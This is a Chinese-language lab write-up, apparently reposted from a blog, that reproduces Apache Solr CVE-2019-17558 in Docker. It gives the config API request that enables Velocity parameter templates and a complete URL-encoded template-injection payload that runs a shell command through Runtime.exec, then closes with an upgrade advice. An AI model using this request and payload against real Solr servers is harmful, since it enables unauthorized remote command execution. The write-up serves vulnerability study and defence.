一、Apache Solr介紹
Solr是一個獨立的企業級搜索應用服務器,它對外提供類似于web-service的API介面,用戶可以通過http請求,向搜索引擎服務器提交一定格式的XML檔案,生成索引,也可以通過http get操作提出查找請求,并得到XML格式的回傳結果,
二、漏洞描述
Solr中存在VelocityResponseWriter組件,攻擊者可以構造特定請求修改相關配置,使VelocityResponseWriter組件允許加載指定模板,進而導致Velocity模版注入遠程命令執行漏洞,攻擊者利用該漏洞可以直接獲取到服務器權限,
漏洞產生原因:
在其 5.0.0 到 8.3.1版本中,用戶可以注入自定義模板,通過Velocity模板語言執行任意命令,
參考:(https://www.cnblogs.com/yuzly/p/11782608.html)
三、漏洞影響版本
Apache Solr 5.x - 8.2.0,存在config API版本
四、漏洞復現
靶機IP :192.168.200.130
1、啟動環境,這里直接使用docker搭建
路徑:solr/CVE-2019-17558
啟動一個Apache Solr 8.2.0服務器:

列出相應容器
docker-compose ps

登錄solr服務器
http://your-ip:8983

2、利用默認的demo
默認情況下`params.resource.loader.enabled`配置未打開,無法使用自定義模板,我們先通過如下API獲取所有的核心:
http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

3、開啟 params.resource.loader.enabled
其中API路徑包含剛才獲取的core名稱

POST /solr/demo/config HTTP/1.1 Host: solr:8983 Content-Type: application/json Content-Length: 259 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
4、查看demo的配置

可以看到,`params.resource.loader.enabled` 已經開啟
5、注入Velocity模板執行任意命令
http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

在exec函式里可以執行任意代碼:

五、修復建議
建議升級Appache Salc到最新版
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/499341.html
標籤:其他
